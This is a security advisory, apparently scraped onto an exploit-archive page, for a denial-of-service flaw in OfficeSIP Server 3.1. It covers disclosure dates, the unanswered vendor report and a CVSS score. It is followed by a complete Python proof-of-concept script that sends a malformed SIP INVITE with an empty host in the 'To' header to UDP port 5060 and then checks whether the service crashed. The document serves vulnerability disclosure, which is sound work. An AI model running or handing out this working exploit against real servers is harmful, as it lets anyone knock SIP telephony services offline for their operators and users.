扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 |
############################################################################## # # Title: OfficeSIP Server Denial Of Service Vulnerability # Author : Prabhu S Angadi SecPod Technologies (www.secpod.com) # Vendor : http://www.officesip.com # Advisory : http://secpod.org/blog/?p=461 #http://secpod.org/advisories/SecPod_Exploit_OfficeSIP_Server_DOS_Vuln.txt #http://secpod.org/exploits/SecPod_Exploit_OfficeSIP_Server_DOS.py # Software : OfficeSIP Server 3.1 # Date : 01/02/2012 # ############################################################################### SecPod ID: 1034 22/12/2011 Issue Discovered 20/01/2012 Reported to Vendor No Response 01/02/2012 Advisory Released Class: Denial Of Service Severity: Medium Overview: --------- Office SIP Server version 3.1 is prone to a denial of service vulnerability. Technical Description: ---------------------- The vulnerability is caused due to improper validation of SIP/SIPS URI in the 'To' header of the request, which allows remote attackers to cause denial of service condition. Impact: -------- Successful exploitation could allow an attacker to crash the service. Affected Software: ------------------ OfficeSIP Server 3.1 Tested on: ----------- OfficeSIP Server 3.1 on Windows XP SP2 & SP3. Older versions might be affected. References: ----------- http://www.officesip.com http://secpod.org/blog/?p=461 http://www.officesip.com/download/OfficeSIP-Server-3.1.zip Proof of Concept: ---------------- http://secpod.org/exploits/SecPod_Exploit_OfficeSIP_Server_DOS.py Solution: ---------- Not available Risk Factor: ------------- CVSS Score Report: ACCESS_VECTOR= NETWORK ACCESS_COMPLEXITY= LOW AUTHENTICATION = NOT_REQUIRED CONFIDENTIALITY_IMPACT = NONE INTEGRITY_IMPACT = NONE AVAILABILITY_IMPACT= PARTIAL EXPLOITABILITY = PROOF_OF_CONCEPT REMEDIATION_LEVEL= UNAVAILABLE REPORT_CONFIDENCE= CONFIRMED CVSS Base Score= 5 (AV:N/AC:L/Au:N/C:N/I:N/A:P) Risk factor= Medium Credits: -------- Prabhu S Angadi of SecPod Technologies has been credited with the discovery of this vulnerability. #!/usr/bin/python ############################################################################## # # Title: OfficeSIP Server Denial Of Service Vulnerability # Author : Prabhu S Angadi SecPod Technologies (www.secpod.com) # Vendor : http://www.officesip.com # Advisory : http://secpod.org/blog/?p=461 #http://secpod.org/advisories/SecPod_Exploit_OfficeSIP_Server_DOS_Vuln.txt #http://secpod.org/exploits/SecPod_Exploit_OfficeSIP_Server_DOS.py # Software : OfficeSIP Server 3.1 # Date : 01/02/2012 # ############################################################################## import socket,sys,time port = 5060 target = raw_input("Enter host/target ip address: ") if not target: print "Host/Target IP Address is not specified" sys.exit(1) print "you entered ", target try: socket.inet_aton(target) except socket.error: print "Invalid IP address found ..." sys.exit(1) try: sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) except: print "socket() failed service not running" sys.exit(1) #Malicous To SIP URI triggers vulnerability and brings SIP port down exploit = "INVITE sip:test@officesip.local SIP/2.0\r\n"+\ "Via: SIP/2.0/UDP example.com\r\n"+\ "To: user2 <sip:malicioususer@>\r\n"+\ "From: user1 <sip:user1@server1.com>;tag=00\r\n"+\ "Call-ID: test@server.com\r\n"+\ "CSeq: 1 INVITE\r\n"+\ "Contact: <sip:user1@server1.com>\r\n\r\n" sock.sendto(exploit, (target, port)) #Server evaluates and takes a while to go down. time.sleep(40) sock.close() #Verify port is down try: sock.connect() except: print "OfficeSIP server port is down." print "Service not responding ...." sys.exit(1) |
体验盒子
